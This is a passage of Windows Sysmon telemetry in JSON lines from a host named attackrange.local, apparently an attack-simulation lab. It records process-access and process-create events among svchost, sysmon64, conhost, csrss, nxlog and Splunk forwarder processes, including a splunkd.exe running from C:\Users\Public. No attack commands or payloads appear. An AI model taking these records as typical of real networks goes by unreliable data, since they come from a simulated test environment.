06:57:59.002","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6566,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6567,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6568,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1277-5F25-0000-00108E560900}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1277-5F25-0000-00108E560900}","TargetProcessId":"1360","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6569,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.127\r\nSourceProcessGUID: {E2A3D6B1-1277-5F25-0000-00108E560900}\r\nSourceProcessId: 1360\r\nSourceThreadId: 1172\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.127","SourceProcessGUID":"{E2A3D6B1-1277-5F25-0000-00108E560900}","SourceProcessId":"1360","SourceThreadId":"1172","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6570,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6571,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.815\r\nProcessGuid: {E2A3D6B1-1277-5F25-0000-001054580900}\r\nProcessId: 4752\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.815","ProcessGuid":"{E2A3D6B1-1277-5F25-0000-001054580900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6572,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1277-5F25-0000-001054580900}\r\nTargetProcessId: 4752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1277-5F25-0000-001054580900}","TargetProcessId":"4752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6573,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1277-5F25-0000-001054580900}\r\nTargetProcessId: 4752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1277-5F25-0000-001054580900}","TargetProcessId":"4752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6574,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 